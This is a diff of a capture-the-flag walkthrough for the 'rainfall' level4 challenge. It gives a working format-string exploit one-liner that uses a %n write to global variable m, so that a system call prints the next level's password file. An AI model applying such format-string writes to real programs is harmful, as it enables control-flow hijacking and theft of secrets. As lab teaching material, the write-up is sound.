postCC42/rainfall/level4/walkthrough.md

 `python -c 'print "\x10\x98\x04\x08" + "%16930112d%12$n"' | ./level4`
 - "\x10\x98\x04\x08" represents the memory address of m
 - %16930112d: This specifies a format specifier %d with a very large field width (16930112).
-This causes printf to print a large number of characters to satisfy the format specifier.
+This causes printf to print the exact number that n function compares the return of p to.
-- %12$n: This specifies that the number of characters printed so far (%n) should be written to the memory location specified by the 12th argument passed to printf (12$).
+- %12$n: This specifies that the number of characters printed so far (%n) should be written to the memory location specified by the 12th argument passed to printf (12$), that is the memory address of global variable m.

 ## Triggering System Call
 With the return value manipulated, the comparison in function n will evaluate to true, triggering the system call that directly print the /level5/.pass containing the flag